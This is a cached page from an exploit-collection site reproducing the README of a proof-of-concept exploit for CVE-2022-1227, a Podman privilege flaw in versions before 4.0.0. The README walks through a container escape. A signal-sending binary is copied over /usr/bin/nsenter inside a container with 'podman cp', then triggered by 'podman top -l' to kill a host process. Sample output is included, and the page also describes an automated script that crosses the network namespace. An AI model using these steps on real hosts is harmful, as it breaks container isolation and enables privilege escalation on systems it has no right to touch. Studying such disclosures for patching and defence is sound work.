Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-1227 PoC — Podman 权限许可和访问控制问题漏洞

Source
https://github.com/LouisLiuNova/CVE-2022-1227_Exploit
Associated Vulnerability
Title:Podman 权限许可和访问控制问题漏洞 (CVE-2022-1227)
Description:Podman是一款用于在Linux系统上开发、管理和运行OCI容器的引擎。 Podman存在权限许可和访问控制问题漏洞,该漏洞由于运行时权限管理不当而存在该漏洞该漏洞允许远程攻击者提升系统的权限。
Description
A script for exploiting CVE-2022-1227
Readme
# CVE-2022-1227_Exploit

A script for exploiting CVE-2022-1227.

## Background

- Ubuntu `20.10` is recommanded.
- Podman <`4.0.0`; `3.4.4` is recommanded.

> TODO: add what is the principle of this vulnerability

## Install podman

Follow the instruction in the official document:
<https://podman.io/getting-started/installation#installing-on-linux>

For Ubuntu `20.10`, the imstall command should be:

```bash
sudo apt-get install podman=3.4.4+ds1-1ubuntu1
```

## Quick Start

### Simple Exploit

In this section we try a simple PoC to break the bundary of `PID namespace` and `kill` a process in the host.

Here are the steps:

1. Run a container by the following command: `podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity`
2. Run `keep` in `./exp/bin` and get the `PID` it is running. Usually it will display its PID on the terminal. As the binary are set to sleep for 600 seconds, maybe you must be quick to finish the follow steps.

    ```plaintext
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
    My process ID is: 7719
    Put this number to `PID` in the sendsig.c and compile!
    ```

3. Edit the source code in `./exp/src/sendsig.c` and fill in the PID obtained in the previous step in variable `pid`.

   ```c
   int pid = OLD_VAL;
   ```

   to

   ```c
   int pid = 7719;
   ```

4. Put the compiled binary to the internal podman: `podman cp ./exp/bin/sendsig $container_name :/usr/bin/nsenter`
5. Run `podman top` to trigger vulnerability by: `podman top -l`
6. If everything goes right, the running process `keep` will be killed immediately. This is unusual, because normally processes inside the container cannot send signal to processes on the host due to the PID namespace isolation.

    ```plaintext
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
    My process ID is: 7719
    Killed
    ```

## Full exploit

In this section, we use sockets to realize the inter-process socket communication between the client in the container and the server on the host, which is usually impossible when the isolation mechanism is complete. We use this vulnerability to break through the isolation of net namespace to realize this exploit.

First, enter the directory by `cd ./exp`;

By simply running `./exploit.sh`, everything will be done automatically; if everything goes right, the server will display:

```plaintext
Hello from the container!
```

It means we go across the network namespace and escape.
File Snapshot

 [4.0K]  /data/pocs/b9414950635ab2ae22c67c11d07294d90f457d71
├── [4.0K]  exp
│   ├── [4.0K]  bin
│   │   ├── [ 16K]  keep
│   │   ├── [ 16K]  socket_client
│   │   └── [ 16K]  socket_server
│   ├── [1.0K]  exploit.sh
│   └── [4.0K]  src
│       ├── [ 378]  keep.c
│       ├── [ 490]  sendsig.c
│       ├── [ 953]  socket_client.c
│       └── [1.3K]  socket_server.c
├── [ 11K]  LICENSE
└── [2.4K]  README.md

3 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.